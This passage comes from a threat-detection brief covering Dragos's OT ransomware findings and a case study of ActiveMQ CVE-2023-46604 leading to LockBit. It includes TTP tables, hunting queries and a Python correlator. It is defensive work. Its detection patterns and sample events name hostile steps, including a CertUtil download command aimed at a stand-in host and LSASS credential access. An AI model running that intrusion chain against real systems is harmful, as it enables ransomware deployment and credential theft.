| Splunk ESCU | ❌ Gap |
| Elastic | ❌ Gap |
| Elastic | ✅ Partial — defense_evasion_genai_process_compiling_executables.toml covers related GenAI abuse |
Critical gap: Zero detection coverage for MCP server exploitation. First priority: enumerate all MCP servers running in your environment, then build behavioral rules for unexpected child processes from node/python MCP processes.
Sources
6. Dragos 2026 OT/ICS Year in Review: 3 New Threat Groups, Industrial Ransomware +49%
What’s New
Dragos released its 9th Annual OT Cybersecurity Year in Review, introducing three new threat groups (AZURITE, PYROXENE, SYLVANITE), documenting KAMACITE expanding U.S. reconnaissance operations, and confirming 3,300 industrial organizations hit by ransomware in 2025 — a 49% year-over-year increase. ELECTRUM struck Polish wind/solar in December 2025. PYROXENE deployed wiper malware against Israeli critical infrastructure during regional conflict.
Technical Details
| Field | Value |
|---|---|
| Ransomware groups targeting OT | 119 (up from 80 in 2024) |
| Industrial org victims | 3,300 (up from 1,693 in 2024) |
| Top targeted sector | Manufacturing (>2/3 of victims) |
| New threat groups | AZURITE, PYROXENE, SYLVANITE |
| KAMACITE | U.S. ICS reconnaissance (HMIs, VFDs, meters) March–July 2025 |
| ELECTRUM | Polish distributed energy attack (wind/solar) December 2025 |
| PYROXENE | Multi-year supply chain via fake LinkedIn; wiper deployed June 2025 vs. Israel |
| SYLVANITE | Initial access provider; hands access to VOLTZITE for Stage 2 |
| VOLTZITE | Stage 2 — OT workstation compromise, config file exfil |
| AZURITE | Engineering workstation attacks; weaponizes public PoC code |
| Vuln requiring immediate action | 3% (“Now”) |
| Vuln addressable via compensating controls | 71% (“Next”) |
| OT vulns requiring no remediation | 27% (“Never”) |
New Threat Groups
| Group | Focus | Key TTP |
|---|---|---|
| AZURITE | Engineering workstations | Rapid PoC weaponization; exfils alarm data + configs |
| PYROXENE | Supply chain → OT (IRGC-affiliated) | Fake LinkedIn recruiters targeting OT operators; wiper activation |
| SYLVANITE | Initial access provider | Edge device vuln exploitation; hands off to VOLTZITE |
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Reconnaissance | T1591 – Gather Victim Org Info | Fake LinkedIn profiles targeting ICS operators |
| Initial Access | T1190 – Exploit Public-Facing App | Edge device exploitation (SYLVANITE) |
| Collection | T1005 – Data from Local System | Engineering workstation config + alarm data exfil |
| Impact | T1485 – Data Destruction | Custom wiper malware (PYROXENE, BAUXITE) |
| Impact | T1486 – Data Encrypted for Impact | ESXi ransomware affecting OT-hosted SCADA |
Detection Opportunities
# Misclassification prevention: detect Windows Server running SCADA software
# (these get hit as "IT incidents" but are OT)
# Look for: historian software, SCADA HMI processes on "IT" servers
process.name IN ("iFIX.exe", "Wonderware*.exe", "RSLinx*.exe", "FactoryTalk*.exe",
"Ignition-gateway.exe", "wincc*.exe") AND
host.role = "server"
# AZURITE pattern: rapid PoC code execution on engineering workstations
# Alert on public exploit frameworks on HMI/EWS hosts
process.name IN ("python.exe", "python3", "ruby", "go") AND
CommandLine CONTAINS ("exploit", "payload", "shellcode") AND
host.type IN ("engineering_workstation", "HMI")
# Ransomware targeting ESXi hosting OT apps
# Look for ESXi encryption of datastores containing OT VM names
vm.name MATCHES ("SCADA", "Historian", "HMI", "PLC_Gateway", "DCS") AND
event.type = "file_encrypt"
# LinkedIn phishing targeting OT operators (email gateway)
# Sender domain pattern: LinkedIn typosquats, recruitment lures
email.subject MATCHES ("opportunity", "position", "role", "engineer") AND
attachment.type IN (".docx", ".pdf") AND
recipient.department IN ("operations", "control_systems", "engineering")
Log Sources
- ICS/OT endpoint logs (Windows on engineering workstations, HMIs)
- ESXi hypervisor logs (datastore access, VM encryption events)
- Email gateway (LinkedIn-themed phishing detection)
- Network: OT zone segmentation logs, inter-zone traffic
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No rules for KAMACITE/ELECTRUM/PYROXENE/AZURITE/SYLVANITE |
| Sigma | ❌ Gap — No engineering workstation SCADA process anomaly rules |
| Splunk ESCU | ❌ Gap for new groups |
| Elastic | ❌ Gap |
Key insight: Most industrial ransomware incidents are being mislabeled “IT incidents” when ESXi hosts running SCADA/historian software are encrypted. Ensure your detection taxonomy includes SCADA application presence as an OT severity amplifier.
Sources
7. DFIR Report: Apache ActiveMQ CVE-2023-46604 → LockBit (90-Minute Detection Window)
What’s New
The DFIR Report published a detailed intrusion case study of a February 2024 incident where CVE-2023-46604 (Apache ActiveMQ ClassInfo RCE) was exploited twice on the same unpatched server — 18 days apart — ultimately delivering LockBit ransomware via RDP. Critical finding for detection engineers: if an org only detected the second intrusion, they had under 90 minutes before ransomware execution. The intrusion chain (Metasploit → GetSystem → LSASS → lateral movement → AnyDesk → LockBit) is fully documented with timing.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2023-46604 (Apache ActiveMQ ClassInfo RCE) |
| CVSS | 10.0 |
| Exploit method | Java Spring class + malicious XML via CertUtil download |
| Initial payload | Metasploit stager |
| Post-exploit 1 | GetSystem → LSASS dump → lateral movement |
| Re-access (18 days later) | Same unpatched server, same C2 |
| Time to ransomware (TTR) | 419 hours (from first access) |
| TTR (if second intrusion only) | < 90 minutes |
| Lateral movement | Remote service execution + RDP |
| Exfil + persistence | AnyDesk installed on beachhead |
| Discovery | Advanced IP Scanner (renamed binary) |
| Ransomware delivery | LockBit dropped to Downloads folder + double-click execution |
| Ransomware variant | LockBit builder (modified ransom note, Session messaging for C2) |
Intrusion Timeline
Day 0: CVE-2023-46604 exploit → CertUtil download → Metasploit stager
Day 0 +40min: GetSystem → LSASS access → SMB scanning → lateral movement
Day 1: Discovery commands → threat actor loses access
Day 18: Same exploit → re-enter same server → LSASS → domain admin check
Day 18 +20min: Lateral movement to DCs via remote services
Day 18 +20min: RDP to backup server, file server
Day 18 +60min: AnyDesk install, renamed IP Scanner, LockBit dropped
Day 18 +120min: LockBit execution across environment via RDP
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 – Exploit Public-Facing App | CVE-2023-46604 Java deserialization |
| Execution | T1059 – Command & Scripting | CertUtil downloading payload from remote server |
| Privilege Escalation | T1068 – Exploit Vuln | GetSystem via Metasploit |
| Credential Access | T1003.001 – LSASS Memory | LSASS accessed by Metasploit process |
| Discovery | T1046 – Network Service Scan | Renamed Advanced IP Scanner |
| Lateral Movement | T1021.001 – RDP | RDP with harvested domain admin creds |
| Lateral Movement | T1569.002 – Service Execution | Remote service for Metasploit payload |
| Persistence | T1219 – Remote Access Tools | AnyDesk installed on beachhead |
| Impact | T1486 – Data Encrypted | LockBit deployed via double-click on RDP session |
Detection Opportunities
# CVE-2023-46604: CertUtil downloading Java/XML payload
process.name = "certutil.exe" AND
CommandLine CONTAINS ("-urlcache" OR "-f") AND
(CommandLine CONTAINS ".class" OR CommandLine CONTAINS ".xml") AND
parent.name = "java.exe"
# Metasploit GetSystem patterns
# Multiple privilege escalation techniques; look for:
process.name IN ("cmd.exe", "powershell.exe") AND
parent.integrity_level = "Medium" AND
child.integrity_level = "System" AND
CommandLine CONTAINS "whoami /priv"
# LSASS access by non-credential manager processes
event.type = "process_access" AND
target.name = "lsass.exe" AND
NOT process.name IN ("lsass.exe", "svchost.exe", "csrss.exe",
"wininit.exe", "winlogon.exe", "taskmgr.exe")
# Renamed Advanced IP Scanner (discovery tool masquerade)
# Hash check or PE export name vs filename mismatch
OriginalFilename = "Advanced IP Scanner" AND
process.name NOT IN ("Advanced_IP_Scanner.exe", "advanced_ip_scanner.exe")
# AnyDesk installation from unusual parent
process.name = "anydesk.exe" AND
parent.name NOT IN ("explorer.exe", "msiexec.exe") AND
event.type = "process_create"
# LockBit dropped to user Downloads
file.path CONTAINS "\\Downloads\\" AND
file.extension IN (".exe") AND
sha256 NOT IN (known_clean_hashes) AND
process.name = "explorer.exe" # double-click execution
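The individual rules above each fire on one stage; the finding that matters in this case is the 90-minute budget between re-entry and encryption, which only shows up when stages are chained per host. As an added example (not code from The DFIR Report or this brief), this correlator keys on the CertUtil-under-java.exe download as stage one and reports each later stage on the same host with the minutes elapsed and the minutes left in the window. Event shapes, the LSASS reader allowlist (taken from the rule above) and all sample events are constructed; logon events are assumed to be enriched with the originating host.

```python
"""Added example, not from The DFIR Report: per-host stage correlator for the
ActiveMQ -> CertUtil -> LSASS -> RDP chain with a 90-minute budget counted from
the first stage.  Event shapes and sample events are constructed."""
from datetime import datetime, timedelta

BUDGET = timedelta(minutes=90)
LSASS_READERS = {"lsass.exe", "svchost.exe", "csrss.exe", "wininit.exe",
                 "winlogon.exe", "taskmgr.exe"}  # allowlist from the rule above


def stage_of(ev: dict):
    """Map one event to a chain stage, or None if it is not part of the chain."""
    if (ev.get("type") == "process_create" and ev.get("image") == "certutil.exe"
            and ev.get("parent") == "java.exe"
            and "-urlcache" in ev.get("cmdline", "").lower()):
        return "download"
    if (ev.get("type") == "process_access" and ev.get("target") == "lsass.exe"
            and ev.get("image") not in LSASS_READERS):
        return "cred_access"
    if ev.get("type") == "logon" and ev.get("logon_type") == 10:
        return "lateral"  # 4624 type 10, keyed on the originating host (assumed enrichment)
    return None


def correlate(events: list) -> list:
    """Return (host, stage, minutes_since_download, minutes_left) for every
    later stage seen on a host within BUDGET of its 'download' stage."""
    alerts, first_seen = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage is None:
            continue
        host = ev["host"]
        if stage == "download":
            first_seen.setdefault(host, ev["ts"])  # earliest download starts the clock
            continue
        start = first_seen.get(host)
        if start is None or ev["ts"] - start > BUDGET:
            continue
        elapsed = ev["ts"] - start
        alerts.append((host, stage, int(elapsed.total_seconds() // 60),
                       int((BUDGET - elapsed).total_seconds() // 60)))
    return alerts


def t(hhmm: str) -> datetime:
    """Constructed timestamps on a single day."""
    return datetime(2024, 2, 1, int(hhmm[:2]), int(hhmm[3:]))


SAMPLE_EVENTS = [  # constructed, not the report's telemetry
    {"ts": t("10:00"), "host": "AMQ01", "type": "process_create", "image": "certutil.exe",
     "parent": "java.exe", "cmdline": "certutil -urlcache -f http://x.example/a.xml a.xml"},
    {"ts": t("10:12"), "host": "AMQ01", "type": "process_access", "image": "payload.exe",
     "target": "lsass.exe"},
    {"ts": t("10:40"), "host": "AMQ01", "type": "logon", "logon_type": 10},
    {"ts": t("10:15"), "host": "FS01", "type": "process_access", "image": "taskmgr.exe",
     "target": "lsass.exe"},
    {"ts": t("13:00"), "host": "AMQ01", "type": "logon", "logon_type": 10},  # outside budget
]


if __name__ == "__main__":
    for host, stage, elapsed, left in correlate(SAMPLE_EVENTS):
        print(f"{host}: {stage} at +{elapsed} min, {left} min of the 90-minute window left")
```

The "minutes left" column is what to surface to the on-call analyst: a credential-access alert that arrives with 78 minutes on the clock is a different response than the same alert viewed in isolation. The late 13:00 logon on AMQ01 is dropped deliberately; stale state should expire rather than accumulate.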
Log Sources
- Sysmon Events 1 (process create + command line), 10 (process access — LSASS)
- Windows Security Event 4688 (process creation)
- ActiveMQ logs (Java exception traces indicating ClassInfo deserialization)
- Network: Java process outbound connections; CertUtil outbound HTTP
- RDP logs (Event 4624 Type 10 — remote logon)
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ LSASS access: multiple existing rules |
| Sigma | ✅ CertUtil download: proc_creation_win_certutil_download.yml |
| Sigma | ✅ PsExec lateral movement: 36 rules |
| Sigma | ❌ Gap: CVE-2023-46604 Java ClassInfo exploit pattern |
| Sigma | ❌ Gap: ActiveMQ-specific exploit chain |
| Sigma | ✅ AnyDesk: existing remote tool detection rules |
| Splunk ESCU | ✅ LSASS, CertUtil detections exist |
| Elastic | ✅ LSASS, remote tool, credential dumping rules |
| Elastic | ❌ Gap: ActiveMQ-specific exploit detection |
Key takeaway: If your org still has internet-exposed Apache ActiveMQ instances, patch CVE-2023-46604 immediately — it remains actively weaponized. The 90-minute window for detection on re-entry makes LSASS alerting and lateral movement detection non-negotiable.
Sources
Detection Priority Summary
| Priority | Threat | Key Gap |
|---|---|---|
| 🔴 Critical | ClickFix + Matanbuchus 3.0 + AstarionRAT | USOShared staging, mixed-case msiexec, AstarionRAT C2 |
| 🔴 Critical | Seven MCP Server RCEs | Zero coverage — audit your MCP attack surface NOW |
| 🔴 Critical | Silver Fox / ValleyRAT | rundll32 no-args, Batteries task, IpDates_info key |
| 🟠 High | APT28 Operation MacroMaze | Webhook domains from Office process (write this rule) |
| 🟠 High | ActiveMQ → LockBit | ActiveMQ ClassInfo exploit chain (still in wild) |
| 🟡 Medium | Dragos OT Report | OT mislabeling; AZURITE/PYROXENE no coverage |
| 🟢 Intel | CrowdStrike 2026 GTR | Review AI platform audit logging gaps |
Coverage Index Updates
Topics added today:
- CrowdStrike 2026 Global Threat Report (Feb 24)
- Silver Fox APT / Fake Huorong / ValleyRAT (Feb 24)
- APT28 Operation MacroMaze (Feb 24)
- Seven MCP Server RCEs / eval() epidemic (Feb 24)
- ClickFix + Matanbuchus 3.0 + AstarionRAT (Feb 23)
- Dragos 2026 OT/ICS Year in Review / AZURITE/PYROXENE/SYLVANITE (Feb 23)
- DFIR Report: Apache ActiveMQ CVE-2023-46604 → LockBit (Feb 23)